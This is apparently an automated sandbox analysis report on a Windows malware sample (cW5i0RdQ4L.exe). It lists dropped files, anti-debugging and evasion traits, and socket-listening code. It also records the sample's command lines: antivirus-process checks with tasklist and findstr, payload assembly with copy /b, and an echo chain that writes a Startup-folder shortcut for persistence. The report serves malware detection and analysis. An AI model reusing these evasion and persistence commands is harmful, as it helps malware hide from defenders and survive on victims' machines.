Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Section loaded: winrnr.dll	Jump to behavior

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: cW5i0RdQ4L.exe

Static file information: File size 1086602 > 1048576

Source: cW5i0RdQ4L.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E1CBDB push eax; retf	10_2_00E1CBF8
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E28B75 push ecx; ret	10_2_00E28B88
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00908B75 push ecx; ret	16_2_00908B88

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	File created: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\103495\Powder.pif			Jump to dropped file

Drops PE files

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	File created: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\103495\Powder.pif			Jump to dropped file

Creates a start menu entry (Start Menu\Programs\Startup)

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url

Jump to behavior

Stores files to the Windows start menu directory

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\GuardianCryptoElite.url

Jump to behavior

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E859B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	10_2_00E859B3
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E15EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	10_2_00E15EDA
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_009659B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,	16_2_009659B3
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_008F5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,	16_2_008F5EDA

Extensive use of GetProcAddress (often used to hide API calls)

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

10_2_00E233B7

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found evasive API chain (date check)

Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr

Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes

Found large amount of non-executed APIs

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	API coverage: 5.0 %
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	API coverage: 4.8 %

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Code function: 0_2_004062D5 FindFirstFileW,FindClose,	0_2_004062D5
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Code function: 0_2_00402E18 FindFirstFileW,	0_2_00402E18
Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Code function: 0_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	0_2_00406C9B
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E64005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_00E64005
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6494A GetFileAttributesW,FindFirstFileW,FindClose,	10_2_00E6494A
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E63CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	10_2_00E63CE2
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	10_2_00E6C2FF
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	10_2_00E6CD9F
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6CD14 FindFirstFileW,FindClose,	10_2_00E6CD14
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_00E6F5D8
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	10_2_00E6F735
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E6FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	10_2_00E6FA36
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00944005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	16_2_00944005
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094494A GetFileAttributesW,FindFirstFileW,FindClose,	16_2_0094494A
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	16_2_0094C2FF
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	16_2_0094CD9F
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094CD14 FindFirstFileW,FindClose,	16_2_0094CD14
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	16_2_0094F5D8
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	16_2_0094F735
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0094FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	16_2_0094FA36
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00943CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,	16_2_00943CE2

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E15D13 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,

10_2_00E15D13

Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\103495\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Temp\103495	Jump to behavior

Source: Powder.pif, 0000000A.00000002.3572166645.00000000043ED000.00000004.00000800.00020000.00000000.sdmp, GuardianCryptoElite.scr, 00000010.00000002.3572129134.0000000003D10000.00000004.00000800.00020000.00000000.sdmp, GuardianCryptoElite.scr, 00000010.00000002.3572129134.0000000003D51000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: Powder.pif, 0000000A.00000002.3571739331.0000000001B60000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Process information queried: ProcessInformation

Jump to behavior

Contains functionality to block mouse and keyboard input (often used to hinder debugging)

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E745D5 BlockInput,

10_2_00E745D5

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E15240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

10_2_00E15240

Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

10_2_00E35CAC

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

10_2_00E588CD

Enables debug privileges

Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E2A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_00E2A385
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E2A354 SetUnhandledExceptionFilter,	10_2_00E2A354
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0090A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,	16_2_0090A385
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0090A354 SetUnhandledExceptionFilter,	16_2_0090A354

Contains functionality to execute programs as a different user

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E59369 LogonUserW,

10_2_00E59369

Contains functionality to launch a program with higher privileges

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E15240 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

10_2_00E15240

Contains functionality to simulate keystroke presses

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E61AC6 SendInput,keybd_event,

10_2_00E61AC6

Contains functionality to simulate mouse events

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E651E2 mouse_event,

10_2_00E651E2

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Centres Centres.bat & Centres.bat	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa opssvc"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 103495	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "aroundaccommodategroupseverything" Fine	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Correct + ..\Transparent + ..\Barbie + ..\Gloves + ..\Latin + ..\Story + ..\Ski + ..\Appraisal n	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\103495\Powder.pif Powder.pif n	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr" "C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\O"	Jump to behavior

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardiancryptoelite.url" & echo url="c:\users\user\appdata\local\guardiancrypto systems inc\guardiancryptoelite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardiancryptoelite.url" & exit
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardiancryptoelite.url" & echo url="c:\users\user\appdata\local\guardiancrypto systems inc\guardiancryptoelite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\guardiancryptoelite.url" & exit			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

10_2_00E588CD

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E64F1C AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

10_2_00E64F1C

Source: cW5i0RdQ4L.exe, 00000000.00000003.1715750993.0000000002980000.00000004.00000020.00020000.00000000.sdmp, Powder.pif, 0000000A.00000002.3570339653.0000000000EB6000.00000002.00000001.01000000.00000006.sdmp, Powder.pif, 0000000A.00000003.1761264512.0000000004589000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: Powder.pif, GuardianCryptoElite.scr	Binary or memory string: Shell_TrayWnd

Contains functionality to query CPU information (cpuid)

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E2885B cpuid

10_2_00E2885B

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E40030 GetLocalTime,__swprintf,

10_2_00E40030

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

Code function: 10_2_00E40722 GetUserNameW,

10_2_00E40722

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif

10_2_00E3416A

Source: C:\Users\user\Desktop\cW5i0RdQ4L.exe

Code function: 0_2_00406805 GetVersion,GetSystemDirectoryW,GetWindowsDirectoryW,SHGetSpecialFolderLocation,SHGetPathFromIDListW,CoTaskMemFree,lstrcatW,lstrlenW,

0_2_00406805

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

OS version to string mapping found (often used in BOTs)

Source: GuardianCryptoElite.scr	Binary or memory string: WIN_81
Source: GuardianCryptoElite.scr	Binary or memory string: WIN_XP
Source: GuardianCryptoElite.scr	Binary or memory string: WIN_XPe
Source: GuardianCryptoElite.scr	Binary or memory string: WIN_VISTA
Source: GuardianCryptoElite.scr	Binary or memory string: WIN_7
Source: GuardianCryptoElite.scr	Binary or memory string: WIN_8
Source: Serious.0.dr	Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E7696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	10_2_00E7696E
Source: C:\Users\user\AppData\Local\Temp\103495\Powder.pif	Code function: 10_2_00E76E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	10_2_00E76E32
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_0095696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,	16_2_0095696E
Source: C:\Users\user\AppData\Local\GuardianCrypto Systems Inc\GuardianCryptoElite.scr	Code function: 16_2_00956E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,	16_2_00956E32

ID:	1532361
Product:	CloudBasic
Start time:	02:06:27
Start date:	13.10.2024
Sample:	cW5i0RdQ4L.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	c065ba22909fc8dbded4ea0eebb24ad5
SHA1:	b3d61dd7519be3d2909be9ce2d28f65ec7f9965d
SHA256:	9817f4d8bc1374f102196cfcb8a351abdc0563dea60f6084a7525e5ee5409b6d
